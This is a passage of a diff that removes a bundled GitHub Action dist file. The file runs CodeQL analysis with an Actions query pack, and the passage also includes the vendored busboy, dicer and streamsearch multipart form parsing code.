exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.run = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const cql = __importStar(__nccwpck_require__(950)); -/** - * The main function for the action. - * @returns {Promise} Resolves when the action is complete. - */ -async function run() { - try { - // set up codeql - var codeql = await cql.newCodeQL(); - core.debug(`CodeQL CLI found at '${codeql.path}'`); - await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check javascript support - var languages = await cql.runCommandJson(codeql, [ - "resolve", - "languages", - "--format", - "json", - ]); - if (!languages.hasOwnProperty("javascript")) { - core.setFailed("CodeQL javascript extractor not installed"); - throw new Error("CodeQL javascript extractor not installed"); - } - // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } - else { - core.info(`Pack downloaded '${codeql.pack}'`); - } - core.info("Creating CodeQL database..."); - var database_path = await cql.codeqlDatabaseCreate(codeql); - core.info("Running CodeQL analysis..."); - var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path); - core.info(`SARIF results: '${sarif}'`); - core.setOutput("sarif", sarif); - core.info("Finished CodeQL analysis"); - } - catch (error) { - // Fail the workflow run if an error occurs - if (error instanceof Error) - core.setFailed(error.message); - } -} -exports.run = run; -// eslint-disable-next-line @typescript-eslint/no-floating-promises -run(); - - -/***/ }), - -/***/ 9491: -/***/ ((module) => { - -"use strict"; -module.exports = require("assert"); - -/***/ }), - -/***/ 852: -/***/ ((module) => { - -"use strict"; -module.exports = require("async_hooks"); - -/***/ }), - -/***/ 4300: -/***/ ((module) => { - -"use strict"; -module.exports = require("buffer"); - -/***/ }), - -/***/ 2081: -/***/ ((module) => { - -"use strict"; -module.exports = require("child_process"); - -/***/ }), - -/***/ 6206: -/***/ ((module) => { - -"use strict"; -module.exports = require("console"); - -/***/ }), - -/***/ 6113: -/***/ ((module) => { - -"use strict"; -module.exports = require("crypto"); - -/***/ }), - -/***/ 7643: -/***/ ((module) => { - -"use strict"; -module.exports = require("diagnostics_channel"); - -/***/ }), - -/***/ 2361: -/***/ ((module) => { - -"use strict"; -module.exports = require("events"); - -/***/ }), - -/***/ 7147: -/***/ ((module) => { - -"use strict"; -module.exports = require("fs"); - -/***/ }), - -/***/ 3685: -/***/ ((module) => { - -"use strict"; -module.exports = require("http"); - -/***/ }), - -/***/ 5158: -/***/ ((module) => { - -"use strict"; -module.exports = require("http2"); - -/***/ }), - -/***/ 5687: -/***/ ((module) => { - -"use strict"; -module.exports = require("https"); - -/***/ }), - -/***/ 1808: -/***/ ((module) => { - -"use strict"; -module.exports = require("net"); - -/***/ }), - -/***/ 5673: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:events"); - -/***/ }), - -/***/ 4492: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:stream"); - -/***/ }), - -/***/ 7261: -/***/ ((module) => { - -"use strict"; -module.exports = require("node:util"); - -/***/ }), - -/***/ 2037: -/***/ ((module) => { - -"use strict"; -module.exports = require("os"); - -/***/ }), - -/***/ 1017: -/***/ ((module) => { - -"use strict"; -module.exports = require("path"); - -/***/ }), - -/***/ 4074: -/***/ ((module) => { - -"use strict"; -module.exports = require("perf_hooks"); - -/***/ }), - -/***/ 3477: -/***/ ((module) => { - -"use strict"; -module.exports = require("querystring"); - -/***/ }), - -/***/ 2781: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream"); - -/***/ }), - -/***/ 5356: -/***/ ((module) => { - -"use strict"; -module.exports = require("stream/web"); - -/***/ }), - -/***/ 1576: -/***/ ((module) => { - -"use strict"; -module.exports = require("string_decoder"); - -/***/ }), - -/***/ 9512: -/***/ ((module) => { - -"use strict"; -module.exports = require("timers"); - -/***/ }), - -/***/ 4404: -/***/ ((module) => { - -"use strict"; -module.exports = require("tls"); - -/***/ }), - -/***/ 7310: -/***/ ((module) => { - -"use strict"; -module.exports = require("url"); - -/***/ }), - -/***/ 3837: -/***/ ((module) => { - -"use strict"; -module.exports = require("util"); - -/***/ }), - -/***/ 9830: -/***/ ((module) => { - -"use strict"; -module.exports = require("util/types"); - -/***/ }), - -/***/ 1267: -/***/ ((module) => { - -"use strict"; -module.exports = require("worker_threads"); - -/***/ }), - -/***/ 9796: -/***/ ((module) => { - -"use strict"; -module.exports = require("zlib"); - -/***/ }), - -/***/ 2960: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const inherits = (__nccwpck_require__(7261).inherits) - -const StreamSearch = __nccwpck_require__(1142) - -const PartStream = __nccwpck_require__(1620) -const HeaderParser = __nccwpck_require__(2032) - -const DASH = 45 -const B_ONEDASH = Buffer.from('-') -const B_CRLF = Buffer.from('\r\n') -const EMPTY_FN = function () {} - -function Dicer (cfg) { - if (!(this instanceof Dicer)) { return new Dicer(cfg) } - WritableStream.call(this, cfg) - - if (!cfg || (!cfg.headerFirst && typeof cfg.boundary !== 'string')) { throw new TypeError('Boundary required') } - - if (typeof cfg.boundary === 'string') { this.setBoundary(cfg.boundary) } else { this._bparser = undefined } - - this._headerFirst = cfg.headerFirst - - this._dashes = 0 - this._parts = 0 - this._finished = false - this._realFinish = false - this._isPreamble = true - this._justMatched = false - this._firstWrite = true - this._inHeader = true - this._part = undefined - this._cb = undefined - this._ignoreData = false - this._partOpts = { highWaterMark: cfg.partHwm } - this._pause = false - - const self = this - this._hparser = new HeaderParser(cfg) - this._hparser.on('header', function (header) { - self._inHeader = false - self._part.emit('header', header) - }) -} -inherits(Dicer, WritableStream) - -Dicer.prototype.emit = function (ev) { - if (ev === 'finish' && !this._realFinish) { - if (!this._finished) { - const self = this - process.nextTick(function () { - self.emit('error', new Error('Unexpected end of multipart data')) - if (self._part && !self._ignoreData) { - const type = (self._isPreamble ? 'Preamble' : 'Part') - self._part.emit('error', new Error(type + ' terminated early due to unexpected end of multipart data')) - self._part.push(null) - process.nextTick(function () { - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - return - } - self._realFinish = true - self.emit('finish') - self._realFinish = false - }) - } - } else { WritableStream.prototype.emit.apply(this, arguments) } -} - -Dicer.prototype._write = function (data, encoding, cb) { - // ignore unexpected data (e.g. extra trailer data after finished) - if (!this._hparser && !this._bparser) { return cb() } - - if (this._headerFirst && this._isPreamble) { - if (!this._part) { - this._part = new PartStream(this._partOpts) - if (this._events.preamble) { this.emit('preamble', this._part) } else { this._ignore() } - } - const r = this._hparser.push(data) - if (!this._inHeader && r !== undefined && r < data.length) { data = data.slice(r) } else { return cb() } - } - - // allows for "easier" testing - if (this._firstWrite) { - this._bparser.push(B_CRLF) - this._firstWrite = false - } - - this._bparser.push(data) - - if (this._pause) { this._cb = cb } else { cb() } -} - -Dicer.prototype.reset = function () { - this._part = undefined - this._bparser = undefined - this._hparser = undefined -} - -Dicer.prototype.setBoundary = function (boundary) { - const self = this - this._bparser = new StreamSearch('\r\n--' + boundary) - this._bparser.on('info', function (isMatch, data, start, end) { - self._oninfo(isMatch, data, start, end) - }) -} - -Dicer.prototype._ignore = function () { - if (this._part && !this._ignoreData) { - this._ignoreData = true - this._part.on('error', EMPTY_FN) - // we must perform some kind of read on the stream even though we are - // ignoring the data, otherwise node's Readable stream will not emit 'end' - // after pushing null to the stream - this._part.resume() - } -} - -Dicer.prototype._oninfo = function (isMatch, data, start, end) { - let buf; const self = this; let i = 0; let r; let shouldWriteMore = true - - if (!this._part && this._justMatched && data) { - while (this._dashes < 2 && (start + i) < end) { - if (data[start + i] === DASH) { - ++i - ++this._dashes - } else { - if (this._dashes) { buf = B_ONEDASH } - this._dashes = 0 - break - } - } - if (this._dashes === 2) { - if ((start + i) < end && this._events.trailer) { this.emit('trailer', data.slice(start + i, end)) } - this.reset() - this._finished = true - // no more parts will be added - if (self._parts === 0) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } - } - if (this._dashes) { return } - } - if (this._justMatched) { this._justMatched = false } - if (!this._part) { - this._part = new PartStream(this._partOpts) - this._part._read = function (n) { - self._unpause() - } - if (this._isPreamble && this._events.preamble) { this.emit('preamble', this._part) } else if (this._isPreamble !== true && this._events.part) { this.emit('part', this._part) } else { this._ignore() } - if (!this._isPreamble) { this._inHeader = true } - } - if (data && start < end && !this._ignoreData) { - if (this._isPreamble || !this._inHeader) { - if (buf) { shouldWriteMore = this._part.push(buf) } - shouldWriteMore = this._part.push(data.slice(start, end)) - if (!shouldWriteMore) { this._pause = true } - } else if (!this._isPreamble && this._inHeader) { - if (buf) { this._hparser.push(buf) } - r = this._hparser.push(data.slice(start, end)) - if (!this._inHeader && r !== undefined && r < end) { this._oninfo(false, data, start + r, end) } - } - } - if (isMatch) { - this._hparser.reset() - if (this._isPreamble) { this._isPreamble = false } else { - if (start !== end) { - ++this._parts - this._part.on('end', function () { - if (--self._parts === 0) { - if (self._finished) { - self._realFinish = true - self.emit('finish') - self._realFinish = false - } else { - self._unpause() - } - } - }) - } - } - this._part.push(null) - this._part = undefined - this._ignoreData = false - this._justMatched = true - this._dashes = 0 - } -} - -Dicer.prototype._unpause = function () { - if (!this._pause) { return } - - this._pause = false - if (this._cb) { - const cb = this._cb - this._cb = undefined - cb() - } -} - -module.exports = Dicer - - -/***/ }), - -/***/ 2032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) -const getLimit = __nccwpck_require__(1467) - -const StreamSearch = __nccwpck_require__(1142) - -const B_DCRLF = Buffer.from('\r\n\r\n') -const RE_CRLF = /\r\n/g -const RE_HDR = /^([^:]+):[ \t]?([\x00-\xFF]+)?$/ // eslint-disable-line no-control-regex - -function HeaderParser (cfg) { - EventEmitter.call(this) - - cfg = cfg || {} - const self = this - this.nread = 0 - this.maxed = false - this.npairs = 0 - this.maxHeaderPairs = getLimit(cfg, 'maxHeaderPairs', 2000) - this.maxHeaderSize = getLimit(cfg, 'maxHeaderSize', 80 * 1024) - this.buffer = '' - this.header = {} - this.finished = false - this.ss = new StreamSearch(B_DCRLF) - this.ss.on('info', function (isMatch, data, start, end) { - if (data && !self.maxed) { - if (self.nread + end - start >= self.maxHeaderSize) { - end = self.maxHeaderSize - self.nread + start - self.nread = self.maxHeaderSize - self.maxed = true - } else { self.nread += (end - start) } - - self.buffer += data.toString('binary', start, end) - } - if (isMatch) { self._finish() } - }) -} -inherits(HeaderParser, EventEmitter) - -HeaderParser.prototype.push = function (data) { - const r = this.ss.push(data) - if (this.finished) { return r } -} - -HeaderParser.prototype.reset = function () { - this.finished = false - this.buffer = '' - this.header = {} - this.ss.reset() -} - -HeaderParser.prototype._finish = function () { - if (this.buffer) { this._parseHeader() } - this.ss.matches = this.ss.maxMatches - const header = this.header - this.header = {} - this.buffer = '' - this.finished = true - this.nread = this.npairs = 0 - this.maxed = false - this.emit('header', header) -} - -HeaderParser.prototype._parseHeader = function () { - if (this.npairs === this.maxHeaderPairs) { return } - - const lines = this.buffer.split(RE_CRLF) - const len = lines.length - let m, h - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (lines[i].length === 0) { continue } - if (lines[i][0] === '\t' || lines[i][0] === ' ') { - // folded header content - // RFC2822 says to just remove the CRLF and not the whitespace following - // it, so we follow the RFC and include the leading whitespace ... - if (h) { - this.header[h][this.header[h].length - 1] += lines[i] - continue - } - } - - const posColon = lines[i].indexOf(':') - if ( - posColon === -1 || - posColon === 0 - ) { - return - } - m = RE_HDR.exec(lines[i]) - h = m[1].toLowerCase() - this.header[h] = this.header[h] || [] - this.header[h].push((m[2] || '')) - if (++this.npairs === this.maxHeaderPairs) { break } - } -} - -module.exports = HeaderParser - - -/***/ }), - -/***/ 1620: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const inherits = (__nccwpck_require__(7261).inherits) -const ReadableStream = (__nccwpck_require__(4492).Readable) - -function PartStream (opts) { - ReadableStream.call(this, opts) -} -inherits(PartStream, ReadableStream) - -PartStream.prototype._read = function (n) {} - -module.exports = PartStream - - -/***/ }), - -/***/ 1142: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -/** - * Copyright Brian White. All rights reserved. - * - * @see https://github.com/mscdex/streamsearch - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to - * deal in the Software without restriction, including without limitation the - * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - * sell copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - * IN THE SOFTWARE. - * - * Based heavily on the Streaming Boyer-Moore-Horspool C++ implementation - * by Hongli Lai at: https://github.com/FooBarWidget/boyer-moore-horspool - */ -const EventEmitter = (__nccwpck_require__(5673).EventEmitter) -const inherits = (__nccwpck_require__(7261).inherits) - -function SBMH (needle) { - if (typeof needle === 'string') { - needle = Buffer.from(needle) - } - - if (!Buffer.isBuffer(needle)) { - throw new TypeError('The needle has to be a String or a Buffer.') - } - - const needleLength = needle.length - - if (needleLength === 0) { - throw new Error('The needle cannot be an empty String/Buffer.') - } - - if (needleLength > 256) { - throw new Error('The needle cannot have a length bigger than 256.') - } - - this.maxMatches = Infinity - this.matches = 0 - - this._occ = new Array(256) - .fill(needleLength) // Initialize occurrence table. - this._lookbehind_size = 0 - this._needle = needle - this._bufpos = 0 - - this._lookbehind = Buffer.alloc(needleLength) - - // Populate occurrence table with analysis of the needle, - // ignoring last letter. - for (var i = 0; i < needleLength - 1; ++i) { // eslint-disable-line no-var - this._occ[needle[i]] = needleLength - 1 - i - } -} -inherits(SBMH, EventEmitter) - -SBMH.prototype.reset = function () { - this._lookbehind_size = 0 - this.matches = 0 - this._bufpos = 0 -} - -SBMH.prototype.push = function (chunk, pos) { - if (!Buffer.isBuffer(chunk)) { - chunk = Buffer.from(chunk, 'binary') - } - const chlen = chunk.length - this._bufpos = pos || 0 - let r - while (r !== chlen && this.matches < this.maxMatches) { r = this._sbmh_feed(chunk) } - return r -} - -SBMH.prototype._sbmh_feed = function (data) { - const len = data.length - const needle = this._needle - const needleLength = needle.length - const lastNeedleChar = needle[needleLength - 1] - - // Positive: points to a position in `data` - // pos == 3 points to data[3] - // Negative: points to a position in the lookbehind buffer - // pos == -2 points to lookbehind[lookbehind_size - 2] - let pos = -this._lookbehind_size - let ch - - if (pos < 0) { - // Lookbehind buffer is not empty. Perform Boyer-Moore-Horspool - // search with character lookup code that considers both the - // lookbehind buffer and the current round's haystack data. - // - // Loop until - // there is a match. - // or until - // we've moved past the position that requires the - // lookbehind buffer. In this case we switch to the - // optimized loop. - // or until - // the character to look at lies outside the haystack. - while (pos < 0 && pos <= len - needleLength) { - ch = this._sbmh_lookup_char(data, pos + needleLength - 1) - - if ( - ch === lastNeedleChar && - this._sbmh_memcmp(data, pos, needleLength - 1) - ) { - this._lookbehind_size = 0 - ++this.matches - this.emit('info', true) - - return (this._bufpos = pos + needleLength) - } - pos += this._occ[ch] - } - - // No match. - - if (pos < 0) { - // There's too few data for Boyer-Moore-Horspool to run, - // so let's use a different algorithm to skip as much as - // we can. - // Forward pos until - // the trailing part of lookbehind + data - // looks like the beginning of the needle - // or until - // pos == 0 - while (pos < 0 && !this._sbmh_memcmp(data, pos, len - pos)) { ++pos } - } - - if (pos >= 0) { - // Discard lookbehind buffer. - this.emit('info', false, this._lookbehind, 0, this._lookbehind_size) - this._lookbehind_size = 0 - } else { - // Cut off part of the lookbehind buffer that has - // been processed and append the entire haystack - // into it. - const bytesToCutOff = this._lookbehind_size + pos - if (bytesToCutOff > 0) { - // The cut off data is guaranteed not to contain the needle. - this.emit('info', false, this._lookbehind, 0, bytesToCutOff) - } - - this._lookbehind.copy(this._lookbehind, 0, bytesToCutOff, - this._lookbehind_size - bytesToCutOff) - this._lookbehind_size -= bytesToCutOff - - data.copy(this._lookbehind, this._lookbehind_size) - this._lookbehind_size += len - - this._bufpos = len - return len - } - } - - pos += (pos >= 0) * this._bufpos - - // Lookbehind buffer is now empty. We only need to check if the - // needle is in the haystack. - if (data.indexOf(needle, pos) !== -1) { - pos = data.indexOf(needle, pos) - ++this.matches - if (pos > 0) { this.emit('info', true, data, this._bufpos, pos) } else { this.emit('info', true) } - - return (this._bufpos = pos + needleLength) - } else { - pos = len - needleLength - } - - // There was no match. If there's trailing haystack data that we cannot - // match yet using the Boyer-Moore-Horspool algorithm (because the trailing - // data is less than the needle size) then match using a modified - // algorithm that starts matching from the beginning instead of the end. - // Whatever trailing data is left after running this algorithm is added to - // the lookbehind buffer. - while ( - pos < len && - ( - data[pos] !== needle[0] || - ( - (Buffer.compare( - data.subarray(pos, pos + len - pos), - needle.subarray(0, len - pos) - ) !== 0) - ) - ) - ) { - ++pos - } - if (pos < len) { - data.copy(this._lookbehind, 0, pos, pos + (len - pos)) - this._lookbehind_size = len - pos - } - - // Everything until pos is guaranteed not to contain needle data. - if (pos > 0) { this.emit('info', false, data, this._bufpos, pos < len ? pos : len) } - - this._bufpos = len - return len -} - -SBMH.prototype._sbmh_lookup_char = function (data, pos) { - return (pos < 0) - ? this._lookbehind[this._lookbehind_size + pos] - : data[pos] -} - -SBMH.prototype._sbmh_memcmp = function (data, pos, len) { - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - if (this._sbmh_lookup_char(data, pos + i) !== this._needle[i]) { return false } - } - return true -} - -module.exports = SBMH - - -/***/ }), - -/***/ 727: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const WritableStream = (__nccwpck_require__(4492).Writable) -const { inherits } = __nccwpck_require__(7261) -const Dicer = __nccwpck_require__(2960) - -const MultipartParser = __nccwpck_require__(2183) -const UrlencodedParser = __nccwpck_require__(8306) -const parseParams = __nccwpck_require__(1854) - -function Busboy (opts) { - if (!(this instanceof Busboy)) { return new Busboy(opts) } - - if (typeof opts !== 'object') { - throw new TypeError('Busboy expected an options-Object.') - } - if (typeof opts.headers !== 'object') { - throw new TypeError('Busboy expected an options-Object with headers-attribute.') - } - if (typeof opts.headers['content-type'] !== 'string') { - throw new TypeError('Missing Content-Type-header.') - } - - const { - headers, - ...streamOptions - } = opts - - this.opts = { - autoDestroy: false, - ...streamOptions - } - WritableStream.call(this, this.opts) - - this._done = false - this._parser = this.getParserByHeaders(headers) - this._finished = false -} -inherits(Busboy, WritableStream) - -Busboy.prototype.emit = function (ev) { - if (ev === 'finish') { - if (!this._done) { - this._parser?.end() - return - } else if (this._finished) { - return - } - this._finished = true - } - WritableStream.prototype.emit.apply(this, arguments) -} - -Busboy.prototype.getParserByHeaders = function (headers) { - const parsed = parseParams(headers['content-type']) - - const cfg = { - defCharset: this.opts.defCharset, - fileHwm: this.opts.fileHwm, - headers, - highWaterMark: this.opts.highWaterMark, - isPartAFile: this.opts.isPartAFile, - limits: this.opts.limits, - parsedConType: parsed, - preservePath: this.opts.preservePath - } - - if (MultipartParser.detect.test(parsed[0])) { - return new MultipartParser(this, cfg) - } - if (UrlencodedParser.detect.test(parsed[0])) { - return new UrlencodedParser(this, cfg) - } - throw new Error('Unsupported Content-Type.') -} - -Busboy.prototype._write = function (chunk, encoding, cb) { - this._parser.write(chunk, cb) -} - -module.exports = Busboy -module.exports["default"] = Busboy -module.exports.Busboy = Busboy - -module.exports.Dicer = Dicer - - -/***/ }), - -/***/ 2183: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -// TODO: -// * support 1 nested multipart level -// (see second multipart example here: -// http://www.w3.org/TR/html401/interact/forms.html#didx-multipartform-data) -// * support limits.fieldNameSize -// -- this will require modifications to utils.parseParams - -const { Readable } = __nccwpck_require__(4492) -const { inherits } = __nccwpck_require__(7261) - -const Dicer = __nccwpck_require__(2960) - -const parseParams = __nccwpck_require__(1854) -const decodeText = __nccwpck_require__(4619) -const basename = __nccwpck_require__(8647) -const getLimit = __nccwpck_require__(1467) - -const RE_BOUNDARY = /^boundary$/i -const RE_FIELD = /^form-data$/i -const RE_CHARSET = /^charset$/i -const RE_FILENAME = /^filename$/i -const RE_NAME = /^name$/i - -Multipart.detect = /^multipart\/form-data/i -function Multipart (boy, cfg) { - let i - let len - const self = this - let boundary - const limits = cfg.limits - const isPartAFile = cfg.isPartAFile || ((fieldName, contentType, fileName) => (contentType === 'application/octet-stream' || fileName !== undefined)) - const parsedConType = cfg.parsedConType || [] - const defCharset = cfg.defCharset || 'utf8' - const preservePath = cfg.preservePath - const fileOpts = { highWaterMark: cfg.fileHwm } - - for (i = 0, len = parsedConType.length; i < len; ++i) { - if (Array.isArray(parsedConType[i]) && - RE_BOUNDARY.test(parsedConType[i][0])) { - boundary = parsedConType[i][1] - break - } - } - - function checkFinished () { - if (nends === 0 && finished && !boy._done) { - finished = false - self.end() - } - } - - if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } - - const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) - const filesLimit = getLimit(limits, 'files', Infinity) - const fieldsLimit = getLimit(limits, 'fields', Infinity) - const partsLimit = getLimit(limits, 'parts', Infinity) - const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) - const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) - - let nfiles = 0 - let nfields = 0 - let nends = 0 - let curFile - let curField - let finished = false - - this._needDrain = false - this._pause = false - this._cb = undefined - this._nparts = 0 - this._boy = boy - - const parserCfg = { - boundary, - maxHeaderPairs: headerPairsLimit, - maxHeaderSize: headerSizeLimit, - partHwm: fileOpts.highWaterMark, - highWaterMark: cfg.highWaterMark - } - - this.parser = new Dicer(parserCfg) - this.parser.on('drain', function () { - self._needDrain = false - if (self._cb && !self._pause) { - const cb = self._cb - self._cb = undefined - cb() - } - }).on('part', function onPart (part) { - if (++self._nparts > partsLimit) { - self.parser.removeListener('part', onPart) - self.parser.on('part', skipPart) - boy.hitPartsLimit = true - boy.emit('partsLimit') - return skipPart(part) - } - - // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let - // us emit 'end' early since we know the part has ended if we are already - // seeing the next part - if (curField) { - const field = curField - field.emit('end') - field.removeAllListeners('end') - } - - part.on('header', function (header) { - let contype - let fieldname - let parsed - let charset - let encoding - let filename - let nsize = 0 - - if (header['content-type']) { - parsed = parseParams(header['content-type'][0]) - if (parsed[0]) { - contype = parsed[0].toLowerCase() - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_CHARSET.test(parsed[i][0])) { - charset = parsed[i][1].toLowerCase() - break - } - } - } - } - - if (contype === undefined) { contype = 'text/plain' } - if (charset === undefined) { charset = defCharset } - - if (header['content-disposition']) { - parsed = parseParams(header['content-disposition'][0]) - if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } - for (i = 0, len = parsed.length; i < len; ++i) { - if (RE_NAME.test(parsed[i][0])) { - fieldname = parsed[i][1] - } else if (RE_FILENAME.test(parsed[i][0])) { - filename = parsed[i][1] - if (!preservePath) { filename = basename(filename) } - } - } - } else { return skipPart(part) } - - if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } - - let onData, - onEnd - - if (isPartAFile(fieldname, contype, filename)) { - // file/binary field - if (nfiles === filesLimit) { - if (!boy.hitFilesLimit) { - boy.hitFilesLimit = true - boy.emit('filesLimit') - } - return skipPart(part) - } - - ++nfiles - - if (!boy._events.file) { - self.parser._ignore() - return - } - - ++nends - const file = new FileStream(fileOpts) - curFile = file - file.on('end', function () { - --nends - self._pause = false - checkFinished() - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - }) - file._read = function (n) { - if (!self._pause) { return } - self._pause = false - if (self._cb && !self._needDrain) { - const cb = self._cb - self._cb = undefined - cb() - } - } - boy.emit('file', fieldname, file, filename, encoding, contype) - - onData = function (data) { - if ((nsize += data.length) > fileSizeLimit) { - const extralen = fileSizeLimit - nsize + data.length - if (extralen > 0) { file.push(data.slice(0, extralen)) } - file.truncated = true - file.bytesRead = fileSizeLimit - part.removeAllListeners('data') - file.emit('limit') - return - } else if (!file.push(data)) { self._pause = true } - - file.bytesRead = nsize - } - - onEnd = function () { - curFile = undefined - file.push(null) - } - } else { - // non-file field - if (nfields === fieldsLimit) { - if (!boy.hitFieldsLimit) { - boy.hitFieldsLimit = true - boy.emit('fieldsLimit') - } - return skipPart(part) - } - - ++nfields - ++nends - let buffer = '' - let truncated = false - curField = part - - onData = function (data) { - if ((nsize += data.length) > fieldSizeLimit) { - const extralen = (fieldSizeLimit - (nsize - data.length)) - buffer += data.toString('binary', 0, extralen) - truncated = true - part.removeAllListeners('data') - } else { buffer += data.toString('binary') } - } - - onEnd = function () { - curField = undefined - if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } - boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) - --nends - checkFinished() - } - } - - /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become - broken. Streams2/streams3 is a huge black box of confusion, but - somehow overriding the sync state seems to fix things again (and still - seems to work for previous node versions). - */ - part._readableState.sync = false - - part.on('data', onData) - part.on('end', onEnd) - }).on('error', function (err) { - if (curFile) { curFile.emit('error', err) } - }) - }).on('error', function (err) { - boy.emit('error', err) - }).on('finish', function () { - finished = true - checkFinished() - }) -} - -Multipart.prototype.write = function (chunk, cb) { - const r = this.parser.write(chunk) - if (r && !this._pause) { - cb() - } else { - this._needDrain = !r - this._cb = cb - } -} - -Multipart.prototype.end = function () { - const self = this - - if (self.parser.writable) { - self.parser.end() - } else if (!self._boy._done) { - process.nextTick(function () { - self._boy._done = true - self._boy.emit('finish') - }) - } -} - -function skipPart (part) { - part.resume() -} - -function FileStream (opts) { - Readable.call(this, opts) - - this.bytesRead = 0 - - this.truncated = false -} - -inherits(FileStream, Readable) - -FileStream.prototype._read = function (n) {} - -module.exports = Multipart - - -/***/ }), - -/***/ 8306: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Decoder = __nccwpck_require__(7100) -const decodeText = __nccwpck_require__(4619) -const getLimit = __nccwpck_require__(1467) - -const RE_CHARSET = /^charset$/i - -UrlEncoded.detect = /^application\/x-www-form-urlencoded/i -function UrlEncoded (boy, cfg) { - const limits = cfg.limits - const parsedConType = cfg.parsedConType - this.boy = boy - - this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) - this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) - this.fieldsLimit = getLimit(limits, 'fields', Infinity) - - let charset - for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var - if (Array.isArray(parsedConType[i]) && - RE_CHARSET.test(parsedConType[i][0])) { - charset = parsedConType[i][1].toLowerCase() - break - } - } - - if (charset === undefined) { charset = cfg.defCharset || 'utf8' } - - this.decoder = new Decoder() - this.charset = charset - this._fields = 0 - this._state = 'key' - this._checkingBytes = true - this._bytesKey = 0 - this._bytesVal = 0 - this._key = '' - this._val = '' - this._keyTrunc = false - this._valTrunc = false - this._hitLimit = false -} - -UrlEncoded.prototype.write = function (data, cb) { - if (this._fields === this.fieldsLimit) { - if (!this.boy.hitFieldsLimit) { - this.boy.hitFieldsLimit = true - this.boy.emit('fieldsLimit') - } - return cb() - } - - let idxeq; let idxamp; let i; let p = 0; const len = data.length - - while (p < len) { - if (this._state === 'key') { - idxeq = idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x3D/* = */) { - idxeq = i - break - } else if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesKey } - } - - if (idxeq !== undefined) { - // key with assignment - if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', 